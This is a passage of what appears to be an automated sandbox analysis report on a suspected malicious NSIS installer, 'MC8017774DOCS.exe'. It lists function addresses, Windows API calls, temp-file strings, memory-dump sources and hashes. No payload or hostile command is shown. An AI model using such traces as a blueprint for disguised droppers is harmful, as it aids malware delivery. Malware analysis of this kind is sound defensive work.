                                                                                                                                                    • Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
                                                                                                                                                    Function 00405C17 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405C25
                                                                                                                                                    • CharNextW.USER32(00000000), ref: 00405C2A
                                                                                                                                                    • CharNextW.USER32(00000000), ref: 00405C42
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\nse865B.tmp, xrefs: 00405C18
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CharNext
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nse865B.tmp
                                                                                                                                                    • API String ID: 3213498283-2695492296
                                                                                                                                                    • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                                                                                    • Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
                                                                                                                                                    • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                                                                                    • Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
                                                                                                                                                    Function 00405B6C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
                                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
                                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B8E
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                    • API String ID: 2659869361-3936084776
                                                                                                                                                    • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                    • Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
                                                                                                                                                    • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                    • Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD
                                                                                                                                                    Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$Enum
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 464197530-0
                                                                                                                                                    • Opcode ID: 1341f91fd8d518b2ca140e0133bcf02bd0ea54a7f691716fe820626e10176459
                                                                                                                                                    • Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
                                                                                                                                                    • Opcode Fuzzy Hash: 1341f91fd8d518b2ca140e0133bcf02bd0ea54a7f691716fe820626e10176459
                                                                                                                                                    • Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
                                                                                                                                                    Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                    • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                                                                                    • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
                                                                                                                                                    • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                                                                                    • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
                                                                                                                                                    Function 00405C74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                                                                                      • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405C25
                                                                                                                                                      • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                                                                                                      • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405CCD
                                                                                                                                                    • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420), ref: 00405CDD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nse865B.tmp
                                                                                                                                                    • API String ID: 3248276644-2695492296
                                                                                                                                                    • Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                                                                                                    • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
                                                                                                                                                    • Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                                                                                                    • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
                                                                                                                                                    Function 00406165 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063D9,80000002), ref: 004061AB
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 004061B6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                    • String ID: Call
                                                                                                                                                    • API String ID: 3356406503-1824292864
                                                                                                                                                    • Opcode ID: e86e6fd2e5cb5672620ff5ab575da48d8fe54f653cf1da9627cee5843be69ab4
                                                                                                                                                    • Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
                                                                                                                                                    • Opcode Fuzzy Hash: e86e6fd2e5cb5672620ff5ab575da48d8fe54f653cf1da9627cee5843be69ab4
                                                                                                                                                    • Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4
                                                                                                                                                    Function 00405880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004058B6
                                                                                                                                                    Strings
                                                                                                                                                    • Error launching installer, xrefs: 00405893
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                    • String ID: Error launching installer
                                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                                    • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                                                                                                    • Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
                                                                                                                                                    • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                                                                                                    • Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78
                                                                                                                                                    Function 004038F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76233420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
                                                                                                                                                    • GlobalFree.KERNEL32(0084AA50), ref: 00403913
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403904
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                    • API String ID: 1100898210-3936084776
                                                                                                                                                    • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                                                                                    • Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
                                                                                                                                                    • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                                                                                    • Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8
                                                                                                                                                    Function 00405BB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MC8017774DOCS.exe,C:\Users\user\Desktop\MC8017774DOCS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
                                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MC8017774DOCS.exe,C:\Users\user\Desktop\MC8017774DOCS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
